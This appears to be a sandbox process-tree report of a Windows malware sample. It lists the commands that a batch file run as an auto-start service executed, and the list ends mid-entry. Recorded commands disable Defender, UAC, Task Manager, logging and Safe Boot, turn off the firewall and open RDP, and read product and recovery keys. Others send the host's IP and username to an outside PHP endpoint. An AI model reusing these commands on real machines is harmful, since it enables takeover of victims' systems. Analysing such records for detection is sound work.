
  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Disables RegEdit via registry modification

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

    C:\Windows\system32\ipconfig.exe
      ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe
      findstr IPv4

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.107
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c whoami

    C:\Windows\system32\whoami.exe
      whoami
      - Suspicious use of AdjustPrivilegeToken

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=bvrkipts\admin

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net user "Admin"

    C:\Windows\system32\net.exe
      net user "Admin"

      C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user "Admin"

  C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions

  C:\Windows\system32\manage-bde.exe
    manage-bde -off C:

  C:\Windows\system32\manage-bde.exe
    manage-bde -on C:

  C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\sc.exe
    sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe

  C:\Windows\system32\net.exe
    net start MiServicio

    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start MiServicio

  C:\Windows\system32\takeown.exe
    takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\icacls.exe
    icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"

    C:\Windows\system32\reg.exe
      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"

    C:\Windows\system32\find.exe
      find "BackupProductKeyDefault"

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-ExecutionPolicy Restricted -Scope CurrentUser -Force"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey" 2>nul | findstr "RecoveryKey"

    C:\Windows\system32\reg.exe
      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey"

    C:\Windows\system32\findstr.exe
      findstr "RecoveryKey"

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d3164718

  C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\timeout.exe
    timeout /t 300 /nobreak
    - Delays execution with timeout.exe

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat

  C:\Windows\system32\net.exe
    net session

    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session

  C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS

  C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    REG IMPORT "C:\Windows\TEMP\disable_winload.reg"

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass

    C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
    - Modifies data under HKEY_USERS

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

    C:\Windows\system32\ipconfig.exe
      ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe
      findstr IPv4

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c whoami

    C:\Windows\system32\whoami.exe
      whoami
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net user "BVRKIPTS$"

    C:\Windows\system32\net.exe
      net user "BVRKIPTS$"

  C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions

  C:\Windows\system32\manage-bde.exe
    manage-bde -off C:

  C:\Windows\system32\manage-bde.exe
    manage-bde -on C:

  C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\sc.exe
    sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe

  C:\Windows\system32\net.exe
    net start MiServicio

    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start MiServicio

  C:\Windows\system32\takeown.exe
    takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

  C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions

    C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\malware.bat"

  C:\Windows\system32\net.exe
    net session

    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session

  C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\netsh.exe
